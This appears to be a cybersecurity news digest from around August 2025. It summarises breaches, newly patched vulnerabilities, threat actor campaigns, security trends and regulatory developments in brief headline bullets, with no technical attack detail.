Major Incidents or Breaches

  • DaVita, a kidney dialysis provider, confirmed that a ransomware gang breached its network and exfiltrated personal and health information of nearly 2.7 million individuals.
  • CPAP Medical Supplies and Services disclosed a data breach impacting 90,000 individuals, stemming from an intrusion in December 2024.
  • Hundreds of organisations were targeted in a new Atomic macOS Stealer campaign via malvertising between June and August 2025.
  • A clickjacking attack was reported that can steal credentials from browser-integrated password managers.
  • Grok AI chats, intended to be shared privately, were indexed by Google and became publicly searchable.

Newly Discovered Vulnerabilities

  • Apple patched a zero-day vulnerability (CVE-2025-43300) exploited in sophisticated attacks against targeted individuals.
  • A flaw in the ReVault control board in commonly used Dell laptops allowed attackers to gain malicious access down to the device firmware.
  • AWS addressed a vulnerability that allowed attackers to trick Trusted Advisor into displaying unprotected S3 buckets as secure.
  • Microsoft confirmed that August 2025 Windows security updates are causing severe issues with NDI streaming software on Windows 10 and 11.
  • MITRE released an updated list of the most important hardware weaknesses, reflecting current hardware security challenges.

Notable Threat Actor Activity

  • The Chinese state-sponsored group Murky Panda (Silk Typhoon) escalated cloud and telecom espionage, exploiting trusted relationships in cloud environments to access downstream customer networks and data, particularly targeting North American organisations. The group leveraged both n-day and zero-day vulnerabilities for initial access.
  • Pakistani APT36 is abusing Linux .desktop files to install malware in new campaigns against Indian government and defence entities.
  • Campaigns exploiting known vulnerabilities in GeoServer, Redis, and other platforms have been observed, with attackers leveraging these for botnet expansion and malicious activities.
  • A new infostealer malware, Shamos, is targeting Mac devices through fake troubleshooting guides and fixes in ClickFix attacks.

Trends, Tools, or Tactics of Interest

  • Threat actors are increasingly abusing generative AI tools to produce convincing phishing websites rapidly, as observed by Palo Alto Networks’ Unit 42.
  • Survey scam phishing emails are evolving in sophistication, using technical measures to evade detection and steal financial data.
  • Linux malware campaigns are employing malicious RAR filenames in phishing emails to deliver the open-source VShell backdoor, evading antivirus detection.
  • Automation is increasingly redefining penetration testing delivery, with a shift towards more scalable and efficient reporting.
  • The proliferation of AI agents, chatbots, and machine credentials is creating new security management challenges, as these non-human identities now outnumber human users.
  • Insurers are considering limiting payouts for breaches involving unpatched critical vulnerabilities, with resistance from most organisations.
  • AI-assisted code and security reviews (e.g., Anthropic’s Claude) are being explored to enhance application security.
  • Apple Intelligence was found to be collecting more user data than previously understood, including music preferences, location, and potentially encrypted messages.
  • Modern vehicle cybersecurity trends highlight growing threats and the need for new security approaches in automotive systems.

Regulatory or Policy Developments

  • INTERPOL’s Operation Serengeti 2.0 resulted in the arrest of over 1,200 cybercriminals across 18 African nations, dismantling criminal infrastructure and recovering nearly $100 million.
  • CISA released a draft Software Bill of Materials (SBOM) guide for public comment.
  • Ongoing concerns about personal liability for CISOs remain, with increased risk of both legal and criminal targeting.
  • Microsoft has limited China’s access to the Microsoft Active Protections Program (MAPP).